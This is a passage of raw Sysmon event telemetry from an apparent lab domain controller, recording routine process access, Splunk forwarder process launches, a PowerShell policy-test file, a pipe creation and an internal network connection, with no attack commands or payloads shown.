12:06:06.485{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65AE-6064-5301-00000000AE01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.485{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AE-6064-5301-00000000AE01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.345{266CAFBE-65AE-6064-5301-00000000AE01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AF-6064-5501-00000000AE01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65AF-6064-5501-00000000AE01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.922{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AF-6064-5501-00000000AE01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.782{266CAFBE-65AF-6064-5501-00000000AE01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.594{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E077CC85DBCF75F42874FFA2490B2F1,SHA256=43E2277C8DB801C219726F183482DF888A909F83EBEDBCB67F553AB7B9ED2D20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.328{266CAFBE-65AF-6064-5401-00000000AE01}55006008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65AF-6064-5401-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-65AF-6064-5401-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.156{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65AF-6064-5401-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:07.157{266CAFBE-65AF-6064-5401-00000000AE01}5500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000009961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:08.703{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m5ah5s10.3mx.ps12021-03-31 12:06:08.703 23542300x80000000000000009960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:08.671{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FAB2EE6B4EA00B740527FA0B55FDA5,SHA256=F300B5A888F95904EA08865F04585EC0B3B9063833528D4CFFB8B11E989211C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:08.609{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000009958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:06.540{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53652-false10.0.1.12-8000- 10341000x80000000000000009957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:08.093{266CAFBE-65AF-6064-5501-00000000AE01}66086876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000009983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:06:09.812{266CAFBE-65AB-6064-5001-00000000AE01}2456\PSHost.132616659639808539.2456.DefaultAppDomain.powershellC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000009982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 